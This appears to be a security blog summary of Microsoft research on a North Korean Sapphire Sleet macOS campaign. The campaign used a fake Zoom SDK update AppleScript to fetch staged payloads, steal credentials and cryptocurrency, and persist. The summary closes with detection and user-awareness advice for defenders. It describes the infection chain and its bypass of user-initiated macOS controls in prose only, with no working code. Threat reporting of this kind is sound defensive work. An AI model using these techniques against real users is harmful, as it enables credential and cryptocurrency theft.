Sapphire Sleet macOS Intrusion: Key Defender Insights

Introduction

Microsoft has published new research on a macOS intrusion campaign tied to Sapphire Sleet, a North Korean threat actor known for targeting cryptocurrency and finance organizations. The report matters because it shows how attackers can compromise Macs without using a software exploit—simply by convincing users to run what appears to be a legitimate update.

What’s new in this campaign

Microsoft observed Sapphire Sleet using a fake Zoom SDK Update.scpt file to start a multi-stage infection chain on macOS.

Key techniques highlighted

• Social engineering over exploits: The campaign depends on users manually opening and running a malicious AppleScript file.
• Trusted app abuse: The lure opens in macOS Script Editor, a legitimate Apple application, which helps the activity appear benign.
• Multi-stage payload delivery: The script uses curl and osascript to fetch and run additional AppleScript payloads from attacker-controlled infrastructure.
• Credential theft and persistence: Later stages harvest passwords, target cryptocurrency assets, manipulate TCC-related behavior, establish persistence, and exfiltrate sensitive data.
• Decoy update workflow: The malicious script includes fake update instructions and launches trusted system tools to reinforce legitimacy.

Microsoft noted this attack chain can operate outside normal macOS security enforcement boundaries when execution is user-initiated, reducing the effectiveness of controls such as Gatekeeper, notarization checks, quarantine enforcement, and parts of the Transparency, Consent, and Control framework.

Why this matters for defenders

For IT and security teams, the main takeaway is that macOS users remain highly vulnerable to convincing lures, especially in high-value sectors like cryptocurrency, venture capital, finance, and blockchain. The campaign also shows that attackers are increasingly combining legitimate macOS utilities with staged payload delivery to avoid raising suspicion.

Organizations using Microsoft Defender should review Microsoft’s newly published detections, hunting guidance, and indicators of compromise for this activity. Cross-platform visibility is essential, particularly for environments that have historically treated Macs as lower-risk endpoints.

Recommended next steps

• Educate users to avoid running unexpected update files, especially .scpt files or scripts delivered outside official channels.
• Keep macOS up to date with Apple’s latest protections and security updates.
• Review endpoint detections for suspicious use of Script Editor, osascript, and curl in sequence.
• Hunt for fake update activity and abnormal AppleScript execution tied to external downloads.
• Prioritize high-risk users in finance, crypto, and executive roles for stronger monitoring and phishing-resistant controls.

This research is a reminder that modern macOS attacks often succeed through persuasion, not exploitation. Security teams should combine user awareness, endpoint monitoring, and layered defense controls to reduce exposure.